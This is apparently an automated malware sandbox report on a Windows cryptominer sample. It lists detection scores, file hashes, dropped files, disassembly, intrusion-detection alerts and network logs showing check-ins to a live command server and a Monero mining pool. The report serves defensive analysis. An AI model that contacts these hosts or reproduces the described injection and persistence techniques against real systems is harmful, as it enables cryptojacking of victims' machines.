              Non-Standard Port
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading
              311
              Process Injection
              Security Account Manager1
              Process Discovery
              SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Obfuscated Files or Information
              NTDS3
              System Information Discovery
              Distributed Component Object ModelInput Capture2
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading
              LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1487770 Sample: MenSncKnTI.exe Startdate: 05/08/2024 Architecture: WINDOWS Score: 100 46 monerooceans.stream 2->46 48 gulf.moneroocean.stream 2->48 56 Multi AV Scanner detection for domain / URL 2->56 58 Multi AV Scanner detection for submitted file 2->58 60 Yara detected Xmrig cryptocurrency miner 2->60 62 3 other signatures 2->62 8 gtgpwwjkduow.exe 1 2->8         started        12 MenSncKnTI.exe 2 2->12         started        14 svchost.exe 2->14         started        signatures3 process4 file5 38 C:\Windows\Temp\mrjtggjdzomz.sys, PE32+ 8->38 dropped 64 Multi AV Scanner detection for dropped file 8->64 66 Injects code into the Windows Explorer (explorer.exe) 8->66 68 Modifies the context of a thread in another process (thread injection) 8->68 70 Sample is not signed and drops a device driver 8->70 16 explorer.exe 8->16         started        20 conhost.exe 8->20         started        40 C:\ProgramData\...\gtgpwwjkduow.exe, PE32+ 12->40 dropped 22 sc.exe 1 12->22         started        24 sc.exe 1 12->24         started        26 sc.exe 1 12->26         started        28 sc.exe 1 12->28         started        signatures6 process7 dnsIp8 42 monerooceans.stream 149.102.143.109, 10128, 49710 COGENT-174US United States 16->42 44 185.196.9.187, 49393, 49397, 49400 SIMPLECARRIERCH Switzerland 16->44 50 System process connects to network (likely due to code injection or exploit) 16->50 52 Query firmware table information (likely to detect VMs) 16->52 30 conhost.exe 22->30         started        32 conhost.exe 24->32         started        34 conhost.exe 26->34         started        36 conhost.exe 28->36         started        signatures9 54 Detected Stratum mining protocol 42->54 process10

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              MenSncKnTI.exe61%VirustotalBrowse
              MenSncKnTI.exe79%ReversingLabsWin64.Trojan.MintZard
              SourceDetectionScannerLabelLink
              C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exe79%ReversingLabsWin64.Trojan.MintZard
              C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exe61%VirustotalBrowse
              C:\Windows\Temp\mrjtggjdzomz.sys5%ReversingLabs
              C:\Windows\Temp\mrjtggjdzomz.sys4%VirustotalBrowse
              No Antivirus matches
              SourceDetectionScannerLabelLink
              monerooceans.stream1%VirustotalBrowse
              gulf.moneroocean.stream4%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://185.196.9.187/api/endpoint.php0%Avira URL Cloudsafe
              http://185.196.9.187/api/endpoint.php5%VirustotalBrowse
              NameIPActiveMaliciousAntivirus DetectionReputation
              monerooceans.stream
              149.102.143.109
              truetrueunknown
              gulf.moneroocean.stream
              unknown
              unknownfalseunknown
              NameMaliciousAntivirus DetectionReputation
              http://185.196.9.187/api/endpoint.phptrue
              • 5%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              185.196.9.187
              unknownSwitzerland
              42624SIMPLECARRIERCHtrue
              149.102.143.109
              monerooceans.streamUnited States
              174COGENT-174UStrue
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1487770
              Start date and time:2024-08-05 05:57:06 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 8m 15s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:18
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:MenSncKnTI.exe
              renamed because original name is a hash value
              Original Sample Name:eb7eb5acecb06deab2b4fce875d6c079.exe
              Detection:MAL
              Classification:mal100.evad.mine.winEXE@19/2@1/2
              EGA Information:
              • Successful, ratio: 33.3%
              HCA Information:Failed
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Override analysis time to 240000 for current running targets taking high CPU consumption
              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target MenSncKnTI.exe, PID 4884 because it is empty
              • Execution Graph export aborted for target gtgpwwjkduow.exe, PID 4896 because it is empty
              • Not all processes where analyzed, report is missing behavior information
              TimeTypeDescription
              23:57:54API Interceptor1x Sleep call for process: MenSncKnTI.exe modified
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              185.196.9.187w859ZBDwaQ.exeGet hashmaliciousUnknownBrowse
                w859ZBDwaQ.exeGet hashmaliciousUnknownBrowse
                  149.102.143.109SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeGet hashmaliciousXmrigBrowse
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    monerooceans.streamSecuriteInfo.com.Win32.Malware-gen.17013.17645.exeGet hashmaliciousXmrigBrowse
                    • 149.102.143.109
                    MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zipGet hashmaliciousXmrigBrowse
                    • 44.196.193.227
                    17ae2fbf36a41622374adfd3b1608e08.10.drGet hashmaliciousUnknownBrowse
                    • 44.224.209.130
                    SecuriteInfo.com.Win64.Evo-gen.32403.24162.exeGet hashmaliciousXmrigBrowse
                    • 44.196.193.227
                    GoogleCrashHandler.exeGet hashmaliciousXmrigBrowse
                    • 44.196.193.227
                    yljlbesdmoas.exeGet hashmaliciousXmrigBrowse
                    • 44.196.193.227
                    GoogleCrashHandler.exeGet hashmaliciousXmrigBrowse
                    • 44.196.193.227
                    GoogleCrashHandler.exeGet hashmaliciousXmrigBrowse
                    • 44.224.209.130
                    vHAgn4Dx00.exeGet hashmaliciousAveMaria, UACMe, XmrigBrowse
                    • 44.224.209.130
                    vABMEuk0Ie.exeGet hashmaliciousXmrigBrowse
                    • 44.196.193.227
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    SIMPLECARRIERCHw859ZBDwaQ.exeGet hashmaliciousUnknownBrowse
                    • 185.196.9.187
                    w859ZBDwaQ.exeGet hashmaliciousUnknownBrowse
                    • 185.196.9.187
                    q.bin.exeGet hashmaliciousXWormBrowse
                    • 185.196.10.132
                    2KEOzMcha8.lnkGet hashmaliciousXWormBrowse
                    • 185.196.10.132
                    5W69EF4IxU.lnkGet hashmaliciousXWormBrowse
                    • 185.196.10.132
                    CvK3nrYTRQ.exeGet hashmaliciousXWormBrowse
                    • 185.196.10.132
                    LisectAVT_2403002B_264.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                    • 185.196.11.12
                    LisectAVT_2403002A_392.exeGet hashmaliciousNovaSentinelBrowse
                    • 185.196.9.89
                    RPHbzz3JqY.exeGet hashmaliciousScreenConnect Tool, PureLog Stealer, RedLine, Xmrig, zgRATBrowse
                    • 185.196.10.57
                    file.exeGet hashmaliciousAmadey, Babadeda, Stealc, Vidar, XmrigBrowse
                    • 185.196.10.57
                    COGENT-174US.5r3fqt67ew531has4231.x86.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                    • 38.192.195.53
                    66af531b832ee_main.exeGet hashmaliciousVidarBrowse
                    • 38.180.132.96
                    66af4e35e761b_doz.exeGet hashmaliciousVidarBrowse
                    • 38.180.132.96
                    Urq5Bp4bgs.elfGet hashmaliciousUnknownBrowse
                    • 74.63.92.214
                    yLfAxBEcuo.exeGet hashmaliciousCryptbot, Vidar, XmrigBrowse
                    • 38.180.132.96
                    a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exeGet hashmaliciousVidarBrowse
                    • 38.180.132.96
                    SecuriteInfo.com.Linux.Siggen.9999.32301.6786.elfGet hashmaliciousMiraiBrowse
                    • 38.11.161.217
                    wKrQaAEaJ4.elfGet hashmaliciousMiraiBrowse
                    • 206.5.238.131
                    HhaL0xmHfu.elfGet hashmaliciousMiraiBrowse
                    • 149.107.177.254
                    aY6mdZG2s6.elfGet hashmaliciousMiraiBrowse
                    • 38.32.115.232
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    C:\Windows\Temp\mrjtggjdzomz.sysSecuriteInfo.com.Win64.Evo-gen.9790.15318.exeGet hashmaliciousXmrigBrowse
                      setup.exeGet hashmaliciousXmrigBrowse
                        Xbox.exeGet hashmaliciousXWorm, XmrigBrowse
                          E5r67vtBtc6.exeGet hashmaliciousXmrigBrowse
                            Miner-XMR2.exeGet hashmaliciousXmrigBrowse
                              DNQuHRCp7X.exeGet hashmaliciousBlank Grabber, XmrigBrowse
                                n6o0pd9pZC.exeGet hashmaliciousXmrigBrowse
                                  lfjG1UlwP1.exeGet hashmaliciousLummaC, XmrigBrowse
                                    SecuriteInfo.com.Trojan.InjectNET.17.32646.13700.exeGet hashmaliciousLummaC, XmrigBrowse
                                      SecuriteInfo.com.FileRepMalware.25250.22977.exeGet hashmaliciousXmrigBrowse
                                        Process:C:\Users\user\Desktop\MenSncKnTI.exe
                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):5219328
                                        Entropy (8bit):6.512690550389807
                                        Encrypted:false
                                        SSDEEP:98304:WoyQksM4D03ZztuWvrBl7IhqUSRK0DtRgNCPpZKFYv:dJM4DQTueNNIG/RJK8
                                        MD5:EB7EB5ACECB06DEAB2B4FCE875D6C079
                                        SHA1:22F0ECEA986B8AFDAA4D2B1254757058D4C2CAB3
                                        SHA-256:3B0503A6C2FB8F5CC645DF4D5AB4DD9161CAB9104DD1B7B8DB0A89956A94BC6E
                                        SHA-512:2A1A96B6C92E3C7621E14B843262A11730556AC75BE311CD59DFE33A46CF7F57F02D04119D66B0A3976BF4D7E9C193AF80266AD98E5ABC4668A62CBECA23070F
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 79%
                                        • Antivirus: Virustotal, Detection: 61%, Browse
                                        Reputation:low
                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......f.........."......v...*O.....@..........@..............................P...........`.....................................................<.....O.......O...............P.x...............................(.......8...........`...`............................text....u.......v.................. ..`.rdata..H........ ...z..............@..@.data.....O.......N.................@....pdata........O.......O.............@..@.00cfg........O.......O.............@..@.tls..........O.......O.............@....rsrc.........O.......O.............@..@.reloc..x.....P.......O.............@..B........................................................................................................................................................................................................................................................................................................
                                        Process:C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exe
                                        File Type:PE32+ executable (native) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):14544
                                        Entropy (8bit):6.2660301556221185
                                        Encrypted:false
                                        SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                        MD5:0C0195C48B6B8582FA6F6373032118DA
                                        SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                        SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                        SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 5%
                                        • Antivirus: Virustotal, Detection: 4%, Browse
                                        Joe Sandbox View:
                                        • Filename: SecuriteInfo.com.Win64.Evo-gen.9790.15318.exe, Detection: malicious, Browse
                                        • Filename: setup.exe, Detection: malicious, Browse
                                        • Filename: Xbox.exe, Detection: malicious, Browse
                                        • Filename: E5r67vtBtc6.exe, Detection: malicious, Browse
                                        • Filename: Miner-XMR2.exe, Detection: malicious, Browse
                                        • Filename: DNQuHRCp7X.exe, Detection: malicious, Browse
                                        • Filename: n6o0pd9pZC.exe, Detection: malicious, Browse
                                        • Filename: lfjG1UlwP1.exe, Detection: malicious, Browse
                                        • Filename: SecuriteInfo.com.Trojan.InjectNET.17.32646.13700.exe, Detection: malicious, Browse
                                        • Filename: SecuriteInfo.com.FileRepMalware.25250.22977.exe, Detection: malicious, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                                        Entropy (8bit):6.512690550389807
                                        TrID:
                                        • Win64 Executable GUI (202006/5) 92.65%
                                        • Win64 Executable (generic) (12005/4) 5.51%
                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                        • DOS Executable Generic (2002/1) 0.92%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:MenSncKnTI.exe
                                        File size:5'219'328 bytes
                                        MD5:eb7eb5acecb06deab2b4fce875d6c079
                                        SHA1:22f0ecea986b8afdaa4d2b1254757058d4c2cab3
                                        SHA256:3b0503a6c2fb8f5cc645df4d5ab4dd9161cab9104dd1b7b8db0a89956a94bc6e
                                        SHA512:2a1a96b6c92e3c7621e14b843262a11730556ac75be311cd59dfe33a46cf7f57f02d04119d66b0a3976bf4d7e9c193af80266ad98e5abc4668a62cbeca23070f
                                        SSDEEP:98304:WoyQksM4D03ZztuWvrBl7IhqUSRK0DtRgNCPpZKFYv:dJM4DQTueNNIG/RJK8
                                        TLSH:3F36235E1463D71FC4782D33CE6EBC07888458EBCB525276941ADDBDA3389068EADB43
                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......f.........."......v...*O.....@..........@..............................P...........`........................................
                                        Icon Hash:00928e8e8686b000
                                        Entrypoint:0x140001140
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x140000000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x66A81609 [Mon Jul 29 22:22:01 2024 UTC]
                                        TLS Callbacks:0x40001760, 0x1, 0x400017e0, 0x1
                                        CLR (.Net) Version:
                                        OS Version Major:6
                                        OS Version Minor:0
                                        File Version Major:6
                                        File Version Minor:0
                                        Subsystem Version Major:6
                                        Subsystem Version Minor:0
                                        Import Hash:203d63d5d9a088e2d84cef737227986b
                                        Instruction
                                        dec eax
                                        sub esp, 28h
                                        dec eax
                                        mov eax, dword ptr [00007ED5h]
                                        mov dword ptr [eax], 00000001h
                                        call 00007F91E4C546FFh
                                        nop
                                        nop
                                        nop
                                        dec eax
                                        add esp, 28h
                                        ret
                                        nop
                                        inc ecx
                                        push edi
                                        inc ecx
                                        push esi
                                        push esi
                                        push edi
                                        push ebx
                                        dec eax
                                        sub esp, 20h
                                        dec eax
                                        mov eax, dword ptr [00000030h]
                                        dec eax
                                        mov edi, dword ptr [eax+08h]
                                        dec eax
                                        mov esi, dword ptr [00007EC9h]
                                        xor eax, eax
                                        dec eax
                                        cmpxchg dword ptr [esi], edi
                                        sete bl
                                        je 00007F91E4C54720h
                                        dec eax
                                        cmp edi, eax
                                        je 00007F91E4C5471Bh
                                        dec esp
                                        mov esi, dword ptr [00009901h]
                                        nop word ptr [eax+eax+00000000h]
                                        mov ecx, 000003E8h
                                        inc ecx
                                        call esi
                                        xor eax, eax
                                        dec eax
                                        cmpxchg dword ptr [esi], edi
                                        sete bl
                                        je 00007F91E4C546F7h
                                        dec eax
                                        cmp edi, eax
                                        jne 00007F91E4C546D9h
                                        dec eax
                                        mov edi, dword ptr [00007E90h]
                                        mov eax, dword ptr [edi]
                                        cmp eax, 01h
                                        jne 00007F91E4C546FEh
                                        mov ecx, 0000001Fh
                                        call 00007F91E4C5B974h
                                        jmp 00007F91E4C54719h
                                        cmp dword ptr [edi], 00000000h
                                        je 00007F91E4C546FBh
                                        mov byte ptr [004F9A71h], 00000001h
                                        jmp 00007F91E4C5470Bh
                                        mov dword ptr [edi], 00000001h
                                        dec eax
                                        mov ecx, dword ptr [00007E7Ah]
                                        dec eax
                                        mov edx, dword ptr [00007E7Bh]
                                        call 00007F91E4C5B96Bh
                                        mov eax, dword ptr [edi]
                                        cmp eax, 01h
                                        jne 00007F91E4C5470Bh
                                        dec eax
                                        mov ecx, dword ptr [00007E50h]
                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xa7c00x3c.rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x4ff0000x3c8.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x4fc0000x180.pdata
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x5000000x78.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x90a00x28.rdata
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x94100x138.rdata
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0xa9600x160.rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000x75e60x76005308a2f98f8531492c4b85ea1b0b2e68False0.5186374470338984data6.1819039499025275IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rdata0x90000x1f480x20006addcb3e81a6c355190a356f46167586False0.4677734375zlib compressed data4.716062691452087IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data0xb0000x4f0e080x4efe00bfbe8792cd716af48dc5115b1bc0757eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .pdata0x4fc0000x1800x2005993f1f99c53d19465375428ae987d93False0.50390625data3.1105060915489524IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .00cfg0x4fd0000x100x200b18c7380298e104adf73576fa46bccc1False0.04296875data0.15127132530476972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .tls0x4fe0000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc0x4ff0000x3c80x4008ddb61ba0dd8bdfc1cb4ed88bd155ed5False0.396484375data3.123510869650262IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0x5000000x780x2005ecc015b9011059c643de3ff209bc0cfFalse0.23046875data1.425957514287425IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_VERSION0x4ff0600x368dataEnglishUnited States0.42660550458715596
                                        DLLImport
                                        msvcrt.dll__C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp, wcsstr
                                        KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery
                                        Language of compilation systemCountry where language is spokenMap
                                        EnglishUnited States
                                        TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                        2024-08-05T06:00:59.258097+0200TCP2051004ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request4940080192.168.2.6185.196.9.187
                                        2024-08-05T05:57:58.301795+0200TCP2051004ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request4971180192.168.2.6185.196.9.187
                                        2024-08-05T05:58:57.306162+0200TCP2051004ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request4939380192.168.2.6185.196.9.187
                                        2024-08-05T06:01:59.170763+0200TCP2051004ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request4940280192.168.2.6185.196.9.187
                                        2024-08-05T05:59:57.728119+0200TCP2051004ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request4939780192.168.2.6185.196.9.187
                                        2024-08-05T05:57:52.917756+0200TCP2826930ETPRO COINMINER XMR CoinMiner Usage4971010128192.168.2.6149.102.143.109
                                        TimestampSource PortDest PortSource IPDest IP
                                        Aug 5, 2024 05:57:56.522265911 CEST4971010128192.168.2.6149.102.143.109
                                        Aug 5, 2024 05:57:56.527246952 CEST1012849710149.102.143.109192.168.2.6
                                        Aug 5, 2024 05:57:56.527442932 CEST4971010128192.168.2.6149.102.143.109
                                        Aug 5, 2024 05:57:56.527587891 CEST4971010128192.168.2.6149.102.143.109
                                        Aug 5, 2024 05:57:56.532380104 CEST1012849710149.102.143.109192.168.2.6
                                        Aug 5, 2024 05:57:57.139280081 CEST1012849710149.102.143.109192.168.2.6
                                        Aug 5, 2024 05:57:57.183310032 CEST4971010128192.168.2.6149.102.143.109
                                        Aug 5, 2024 05:57:57.583003044 CEST4971180192.168.2.6185.196.9.187
                                        Aug 5, 2024 05:57:57.588073969 CEST8049711185.196.9.187192.168.2.6
                                        Aug 5, 2024 05:57:57.588160038 CEST4971180192.168.2.6185.196.9.187
                                        Aug 5, 2024 05:57:57.589481115 CEST4971180192.168.2.6185.196.9.187
                                        Aug 5, 2024 05:57:57.594475985 CEST8049711185.196.9.187192.168.2.6
                                        Aug 5, 2024 05:57:57.594551086 CEST4971180192.168.2.6185.196.9.187
                                        Aug 5, 2024 05:57:57.601222038 CEST8049711185.196.9.187192.168.2.6
                                        Aug 5, 2024 05:57:57.980838060 CEST1012849710149.102.143.109192.168.2.6
                                        Aug 5, 2024 05:57:58.027045012 CEST4971010128192.168.2.6149.102.143.109
                                        Aug 5, 2024 05:57:58.301498890 CEST8049711185.196.9.187192.168.2.6
                                        Aug 5, 2024 05:57:58.301795006 CEST4971180192.168.2.6185.196.9.187
                                        Aug 5, 2024 05:57:58.301903963 CEST8049711185.196.9.187192.168.2.6
                                        Aug 5, 2024 05:57:58.301961899 CEST4971180192.168.2.6185.196.9.187
                                        Aug 5, 2024 05:57:58.307986021 CEST8049711185.196.9.187192.168.2.6
                                        Aug 5, 2024 05:58:56.606077909 CEST4939380192.168.2.6185.196.9.187
                                        Aug 5, 2024 05:58:56.611138105 CEST8049393185.196.9.187192.168.2.6
                                        Aug 5, 2024 05:58:56.611217976 CEST4939380192.168.2.6185.196.9.187
                                        Aug 5, 2024 05:58:56.620807886 CEST4939380192.168.2.6185.196.9.187
                                        Aug 5, 2024 05:58:56.625684023 CEST8049393185.196.9.187192.168.2.6
                                        Aug 5, 2024 05:58:56.625742912 CEST4939380192.168.2.6185.196.9.187
                                        Aug 5, 2024 05:58:56.630642891 CEST8049393185.196.9.187192.168.2.6
                                        Aug 5, 2024 05:58:57.305988073 CEST8049393185.196.9.187192.168.2.6
                                        Aug 5, 2024 05:58:57.306060076 CEST8049393185.196.9.187192.168.2.6
                                        Aug 5, 2024 05:58:57.306162119 CEST4939380192.168.2.6185.196.9.187
                                        Aug 5, 2024 05:58:57.306246996 CEST4939380192.168.2.6185.196.9.187
                                        Aug 5, 2024 05:58:57.311063051 CEST8049393185.196.9.187192.168.2.6
                                        Aug 5, 2024 05:58:57.995783091 CEST4971010128192.168.2.6149.102.143.109
                                        Aug 5, 2024 05:58:58.000895023 CEST1012849710149.102.143.109192.168.2.6
                                        Aug 5, 2024 05:59:37.144783974 CEST1012849710149.102.143.109192.168.2.6
                                        Aug 5, 2024 05:59:37.198729992 CEST4971010128192.168.2.6149.102.143.109
                                        Aug 5, 2024 05:59:57.028983116 CEST4939780192.168.2.6185.196.9.187
                                        Aug 5, 2024 05:59:57.034233093 CEST8049397185.196.9.187192.168.2.6
                                        Aug 5, 2024 05:59:57.034410954 CEST4939780192.168.2.6185.196.9.187
                                        Aug 5, 2024 05:59:57.042526960 CEST4939780192.168.2.6185.196.9.187
                                        Aug 5, 2024 05:59:57.047338963 CEST8049397185.196.9.187192.168.2.6
                                        Aug 5, 2024 05:59:57.047413111 CEST4939780192.168.2.6185.196.9.187
                                        Aug 5, 2024 05:59:57.052295923 CEST8049397185.196.9.187192.168.2.6
                                        Aug 5, 2024 05:59:57.727946043 CEST8049397185.196.9.187192.168.2.6
                                        Aug 5, 2024 05:59:57.728009939 CEST8049397185.196.9.187192.168.2.6
                                        Aug 5, 2024 05:59:57.728118896 CEST4939780192.168.2.6185.196.9.187
                                        Aug 5, 2024 05:59:57.728244066 CEST4939780192.168.2.6185.196.9.187
                                        Aug 5, 2024 05:59:57.733134031 CEST8049397185.196.9.187192.168.2.6
                                        Aug 5, 2024 06:00:37.151859999 CEST4971010128192.168.2.6149.102.143.109
                                        Aug 5, 2024 06:00:37.156930923 CEST1012849710149.102.143.109192.168.2.6
                                        Aug 5, 2024 06:00:49.346122026 CEST1012849710149.102.143.109192.168.2.6
                                        Aug 5, 2024 06:00:49.386306047 CEST4971010128192.168.2.6149.102.143.109
                                        Aug 5, 2024 06:00:58.548584938 CEST4940080192.168.2.6185.196.9.187
                                        Aug 5, 2024 06:00:58.553520918 CEST8049400185.196.9.187192.168.2.6
                                        Aug 5, 2024 06:00:58.553740978 CEST4940080192.168.2.6185.196.9.187
                                        Aug 5, 2024 06:00:58.553913116 CEST4940080192.168.2.6185.196.9.187
                                        Aug 5, 2024 06:00:58.558633089 CEST8049400185.196.9.187192.168.2.6
                                        Aug 5, 2024 06:00:58.558706999 CEST4940080192.168.2.6185.196.9.187
                                        Aug 5, 2024 06:00:58.563455105 CEST8049400185.196.9.187192.168.2.6
                                        Aug 5, 2024 06:00:59.257841110 CEST8049400185.196.9.187192.168.2.6
                                        Aug 5, 2024 06:00:59.257925987 CEST8049400185.196.9.187192.168.2.6
                                        Aug 5, 2024 06:00:59.258096933 CEST4940080192.168.2.6185.196.9.187
                                        Aug 5, 2024 06:00:59.258266926 CEST4940080192.168.2.6185.196.9.187
                                        Aug 5, 2024 06:00:59.263154984 CEST8049400185.196.9.187192.168.2.6
                                        Aug 5, 2024 06:01:07.852348089 CEST1012849710149.102.143.109192.168.2.6
                                        Aug 5, 2024 06:01:07.901768923 CEST4971010128192.168.2.6149.102.143.109
                                        Aug 5, 2024 06:01:58.460608006 CEST4940280192.168.2.6185.196.9.187
                                        Aug 5, 2024 06:01:58.465728998 CEST8049402185.196.9.187192.168.2.6
                                        Aug 5, 2024 06:01:58.465816021 CEST4940280192.168.2.6185.196.9.187
                                        Aug 5, 2024 06:01:58.466027021 CEST4940280192.168.2.6185.196.9.187
                                        Aug 5, 2024 06:01:58.470841885 CEST8049402185.196.9.187192.168.2.6
                                        Aug 5, 2024 06:01:58.470913887 CEST4940280192.168.2.6185.196.9.187
                                        Aug 5, 2024 06:01:58.475872040 CEST8049402185.196.9.187192.168.2.6
                                        Aug 5, 2024 06:01:59.170624971 CEST8049402185.196.9.187192.168.2.6
                                        Aug 5, 2024 06:01:59.170686960 CEST8049402185.196.9.187192.168.2.6
